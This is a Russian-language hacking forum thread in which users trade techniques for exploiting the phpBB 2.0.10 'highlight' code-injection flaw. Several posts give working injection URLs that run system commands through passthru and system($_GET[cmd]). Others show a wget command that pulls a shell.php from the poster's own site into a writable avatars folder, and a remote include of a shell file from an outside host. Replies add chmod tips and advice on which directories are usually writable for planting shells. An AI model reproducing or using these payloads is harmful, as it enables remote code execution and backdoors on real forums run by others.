Форумы phpBB>2.0.10 highlight

Discussion in 'Уязвимости CMS/форумов' started by *Van*, 16 Nov 2005.

  1. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    highlight

    В общем, необходимо взломать форум phpbb 2.0.10 путём эксплуатации баги в highlight.
    Мне не нужно взламывать конкретный форум, просто хочу научиться использовать эту багу.

    Вот что я пробовал:
    Code:
    http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`pwd`.%2527
    Выдаёт(там где должно быть имя чела):
    Code:
    /pub/home/taymen30/сайт/forum 
    Потом пробую:
    Code:
    http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd%20..;ls%20-l
    Выдаёт:)\b#i

    В чём я делаю ошибку?Может кто поможет...
     
  2. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    viewtopic.php?t=275&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
     
  3. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    k1borg, спасибо! Ты мне помог, опираясь на твою подсказку я нашёл де-то на других форумах другой код. Но теперь возникла другая проблема. Например, делаю такой запрос:

    Code:
    http://форум/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=ls%20-l%20/usr/home/сайт/public_html/директория форума/images
    Всё ОК, выдаёт все файлы. Смотрю, у директории avatars права drwxrwxrwx
    Делаю запрос:

    Code:
    http://сайт/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=wget%20http://мой сайт.narod.ru/shell.php%20-P%20/usr/home/сайт/public_html/форум/images/avatars/ 
    Затем смотрюнет ли шелла через ls- его нет ни в директории avatars нигде! =(
     
  4. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Всё, народ, справился сам...только одно не получается:я когда закачиваю шелл на форум, то у него права становятся: -rw-------

    То есть открыть его я не могу. Что мне делать-то?

    Нужно чтобы права стали: -rw-rw----

    Закачиваю fetch'ем
     
    #4 *Van*, 16 Nov 2005
    Last edited: 16 Nov 2005
  5. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    chmod 755 shell.php
     
    _________________________
  6. Extrim

    Extrim Banned

    Joined:
    13 Nov 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    -1
    Че за....

    Че за белеберда коглда я ввожу:&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd ..;ls -l
    Получаю:
    )\b#i
     
  7. dim_ok

    dim_ok Elder - Старейшина

    Joined:
    26 Mar 2005
    Messages:
    173
    Likes Received:
    64
    Reputations:
    47
    попробуй воспользоваться поиском по форуму, уверен тем с таким содержанием не один десяток, а так возможно запрешено выполнение системных команд в php, пробуй инклюдинг - &test=http://site.com/shell.txt?&highlight=%2527.include($_GET[test]).%2527
     
  8. dim_ok

    dim_ok Elder - Старейшина

    Joined:
    26 Mar 2005
    Messages:
    173
    Likes Received:
    64
    Reputations:
    47
    при заливке wget'ом так оно и будет, а если не заливается - возможно wget не установлен на сервере или нет прав на запись
    его там может и не быть
     
  9. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Попробуй залить GET'ом или fetch'ем.
     
  10. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    Делай echo в индекс на крайняк и всё.
     
  11. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    как вссегда наш многоуважаемый димка прав))
    ты воть туда и заливаешь???
     
  12. Extrim

    Extrim Banned

    Joined:
    13 Nov 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    -1
    Мне вот интересно что это такое fetch'емРозпишите плиз :_)
     
  13. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Заливать файлы старайся в папку images-она часто открыта на запись. Ну или avatars.